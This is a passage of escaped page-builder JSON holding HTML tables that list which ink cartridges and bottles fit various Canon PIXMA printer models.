width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP648<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP800<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP800R<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP810<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP830<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP970<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP988<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP996<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d0130d\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"fc01984\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6549880\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX308<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-831 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-830 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX328<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX338<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX347<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX366<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX426<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX876<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX886<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-726 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-726 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-726 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-726 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-725 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA PRO-1<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-29 (Chroma Optimizer)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Dark Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Light Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Matte Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Photo Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Red)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Yellow)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b7fc065\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"387b65d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA PRO-10<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-72 (Chroma Optimizer)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Matte Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Photo Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Red)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA PRO-100<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-42 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Light Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TR8570<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS207<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS307<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS5070<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-771 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-770 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-770XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS5170<\\/p><\\/td><td width=\\\"208\\\"><p>CL-741 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-741XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740\\/CL-741 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"736141f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9e8521a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS8270<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS9170<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS9570<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment 